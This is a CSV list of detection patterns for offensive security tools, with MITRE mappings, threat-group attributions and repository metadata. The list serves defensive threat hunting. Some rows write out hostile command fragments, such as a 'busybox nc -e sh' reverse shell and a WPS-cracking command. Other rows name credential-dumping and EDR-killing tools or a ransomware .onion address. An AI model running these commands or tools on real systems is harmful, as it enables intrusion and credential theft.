"*bully wlan1mon -b * -c 9 -S -F -B -v 3*",".{0,1000}bully\swlan1mon\s\-b\s.{0,1000}\s\-c\s9\s\-S\s\-F\s\-B\s\-v\s3.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36394"
"*bunny.deb.parrot.sh/*",".{0,1000}bunny\.deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36395"
"*bupload_raw*.dll*",".{0,1000}bupload_raw.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","36396"
"*burl http://ipinfo.io 2>/dev/null*",".{0,1000}burl\shttp\:\/\/ipinfo\.io\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","36397"
"*burnett_top_1024.txt*",".{0,1000}burnett_top_1024\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36398"
"*Burp Suite*",".{0,1000}Burp\sSuite.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36399"
"*burp*PayloadParser.py*",".{0,1000}burp.{0,1000}PayloadParser\.py.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","network exploitation tool","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z","36400"
"*burp*SQLMapper.xml*",".{0,1000}burp.{0,1000}SQLMapper\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36401"
"*burp.extension-payloadparser*",".{0,1000}burp\.extension\-payloadparser.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","network exploitation tool","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z","36402"
"*burp_log_*.log*",".{0,1000}burp_log_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36403"
"*Burp_start.bat*",".{0,1000}Burp_start\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36404"
"*Burp_start_en.bat*",".{0,1000}Burp_start_en\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36405"
"*burp2malleable.*",".{0,1000}burp2malleable\..{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","36406"
"*burp-co2/out/artifacts*",".{0,1000}burp\-co2\/out\/artifacts.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36407"
"*BurpCO2Suite.xml*",".{0,1000}BurpCO2Suite\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36408"
"*burpcollaborator.net*",".{0,1000}burpcollaborator\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36409"
"*BurpFunctions.java*",".{0,1000}BurpFunctions\.java.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","36410"
"*burpitem.py*",".{0,1000}burpitem\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36411"
"*burplog.py*",".{0,1000}burplog\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36412"
"*burp-log4shell.jar*",".{0,1000}burp\-log4shell\.jar.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","1","N/A","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","36413"
"*BurpShiroPassiveScan.jar*",".{0,1000}BurpShiroPassiveScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36414"
"*burpstate.py*",".{0,1000}burpstate\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36415"
"*Burpsuite*",".{0,1000}Burpsuite.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36416"
"*burpsuite*.exe*",".{0,1000}burpsuite.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36417"
"*burpsuite*.jar*",".{0,1000}burpsuite.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36418"
"*burpsuite*.sh*",".{0,1000}burpsuite.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36419"
"*burpsuite*.zip*",".{0,1000}burpsuite.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36420"
"*BurpSuiteCn.jar*",".{0,1000}BurpSuiteCn\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36421"
"*BurpSuiteHTTPSmuggler*",".{0,1000}BurpSuiteHTTPSmuggler.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","36422"
"*BurpSuite-SecretFinder*",".{0,1000}BurpSuite\-SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","36423"
"*burp-vulners-scanner-*.jar*",".{0,1000}burp\-vulners\-scanner\-.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36424"
"*burp-xss-sql-plugin*",".{0,1000}burp\-xss\-sql\-plugin.{0,1000}","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","network exploitation tool","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z","36425"
"*buster -e * -f john -l doe -b '****1989'*",".{0,1000}buster\s\-e\s.{0,1000}\s\-f\sjohn\s\-l\sdoe\s\-b\s\'.{0,1000}.{0,1000}.{0,1000}.{0,1000}1989\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36426"
"*busterPayloads.txt*",".{0,1000}busterPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","36427"
"*busybox nc * -e sh*",".{0,1000}busybox\snc\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","36428"
"*bWFsd2FyZQ==*",".{0,1000}bWFsd2FyZQ\=\=.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","36430"
"*bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion*",".{0,1000}bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36431"
"*bWltaWthdHo=*",".{0,1000}bWltaWthdHo\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36432"
"*bWltaWthdHo=*",".{0,1000}bWltaWthdHo\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36433"
"*bWV0YXNwbG9pdA==*",".{0,1000}bWV0YXNwbG9pdA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","36434"
"*bXl6LnhjZ0BnbWFpbC5jb20=*",".{0,1000}bXl6LnhjZ0BnbWFpbC5jb20\=.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","36435"
"*by @ricardojoserf*",".{0,1000}by\s\@ricardojoserf.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","36436"
"*By b4rtik & uf0*",".{0,1000}By\sb4rtik\s\&\suf0.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","36437"
"*By Cn33liz and Skons 2018*",".{0,1000}By\sCn33liz\sand\sSkons\s2018.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","36438"
"*By Cneeliz @Outflank 2019*",".{0,1000}By\sCneeliz\s\@Outflank\s2019.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","36439"
"*byakugan/bin/*",".{0,1000}byakugan\/bin\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36440"
"*Bye_Explorer.ino*",".{0,1000}Bye_Explorer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","36441"
"*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","36442"
"*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","36443"
"*BYOVD_kill_av_edr.*",".{0,1000}BYOVD_kill_av_edr\..{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","N/A","10","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","36444"
